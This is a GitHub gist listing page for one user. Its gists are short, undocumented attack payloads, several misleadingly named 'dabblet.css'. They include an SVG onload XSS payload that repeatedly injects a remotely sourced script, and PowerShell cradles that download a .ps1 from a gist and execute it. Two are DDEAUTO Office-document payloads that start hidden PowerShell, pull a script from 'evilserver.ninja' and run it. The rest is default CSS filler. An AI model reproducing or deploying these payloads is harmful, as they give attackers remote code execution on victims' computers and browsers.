Skip to content

Instantly share code, notes, and snippets.

@elagrija
elagrija / XSS-payload.html
Created August 23, 2018 15:23 — forked from bl4de/XSS-payload.html
Remote XSS
<svg/onload=(function(){d=document;s=d.createElement('script');d.body.appendChild(s);
setInterval(function(){d.body.removeChild(s);s=d.createElement('script');d.body.appendChild(s);
s.src="//127.0.0.1:8888";d.body.appendChild(s);},0);})()>
@elagrija
elagrija / dabblet.css
Created January 22, 2018 04:12
Untitled
PowerShell (New-Object System.Net.WebClient).DownloadFile('https://gist.github.com/anonymous/b6a00e5890fc129812a76930c2a2471e/3d5a18cdf870fc0df7bb1ef60d164a93f02e164a','dab2.ps1');(New-Object -com Shell.Application).ShellExecute('dab2.ps1');
cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('https://gist.github.com/anonymous/b6a00e5890fc129812a76930c2a2471e/3d5a18cdf870fc0df7bb1ef60d164a93f02e164a','dab2.ps1');(New-Object -com Shell.Application).ShellExecute('dab2.ps1'); "
cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('https://gist.github.com/anonymous/b6a00e5890fc129812a76930c2a2471e/3d5a18cdf870fc0df7bb1ef60d164a93f02e164a','dab2.ps1');Start-Process 'dab2.ps1';"
@elagrija
elagrija / dabblet.css
Created January 20, 2018 17:38
Untitled
hi
@elagrija
elagrija / dabblet.css
Created January 12, 2018 12:02
The first commented line is your dabblet’s title
/**
* The first commented line is your dabblet’s title
*/
background: #f06;
background: linear-gradient(45deg, #f06, yellow);
min-height: 100%;
@elagrija
elagrija / dabblet.css
Created January 7, 2018 14:07
Untitled
PowerShell (New-Object System.Net.WebClient).DownloadFile('https://gist.github.com/anonymous/b6a00e5890fc129812a76930c2a2471e/3d5a18cdf870fc0df7bb1ef60d164a93f02e164a','dab2.ps1');(New-Object -com Shell.Application).ShellExecute('dab2.ps1');
cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('https://gist.github.com/anonymous/b6a00e5890fc129812a76930c2a2471e/3d5a18cdf870fc0df7bb1ef60d164a93f02e164a','dab2.ps1');(New-Object -com Shell.Application).ShellExecute('dab2.ps1'); "
cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('https://gist.github.com/anonymous/b6a00e5890fc129812a76930c2a2471e/3d5a18cdf870fc0df7bb1ef60d164a93f02e164a','dab2.ps1');Start-Process 'dab2.ps1';"
@elagrija
elagrija / dabblet.css
Created January 6, 2018 03:51
The first commented line is your dabblet’s title
/**
* The first commented line is your dabblet’s title
*/
background: #f06;
background: linear-gradient(45deg, #f06, yellow);
min-height: 100%;
@elagrija
elagrija / dabblet.css
Created January 4, 2018 10:27
Untitled
$Client = New-Object -TypeName System.Net.WebClient
$Client.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
$client.DownloadFile('https://gist.githubusercontent.com/AndrewSav/c4fb71ae1b379901ad90/raw/23f2d8d5fb8c9c50342ac431cc0360ce44465308/SO33205298','C:\temp\local1.ps1')
$exec = New-Object -com shell.application
$exec.shellexecute('C:\temp\local1.ps1')
@elagrija
elagrija / dabblet.css
Created January 3, 2018 09:30
Untitled
$Client = New-Object -TypeName System.Net.WebClient
$Client.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
$client.DownloadFile('https://gist.githubusercontent.com/AndrewSav/c4fb71ae1b379901ad90/raw/23f2d8d5fb8c9c50342ac431cc0360ce44465308/SO33205298','C:\temp\local1.ps1')
$exec = New-Object -com shell.application
$exec.shellexecute('C:\temp\local1.ps1')
@elagrija
elagrija / dabblet.css
Created December 31, 2017 17:28
Untitled
DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.ninja/pp.ps1');powershell -e $e "
DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI
$Client = (new-object net.webclient);
$Client.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$client.DownloadFile("https://gist.githubusercontent.com/AndrewSav/c4fb71ae1b379901ad90/raw/23f2d8d5fb8c9c50342ac431cc0360ce44465308/SO33205298","C:\temp\local1.ps1");
$Client = New-Object -TypeName System.Net.WebClient
$Client.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
@elagrija
elagrija / dabblet.css
Created December 31, 2017 17:27
Untitled
DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.ninja/pp.ps1');powershell -e $e "
DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI
$Client = (new-object net.webclient);
$Client.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$client.DownloadFile("https://gist.githubusercontent.com/AndrewSav/c4fb71ae1b379901ad90/raw/23f2d8d5fb8c9c50342ac431cc0360ce44465308/SO33205298","C:\temp\local1.ps1");
$Client = New-Object -TypeName System.Net.WebClient
$Client.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials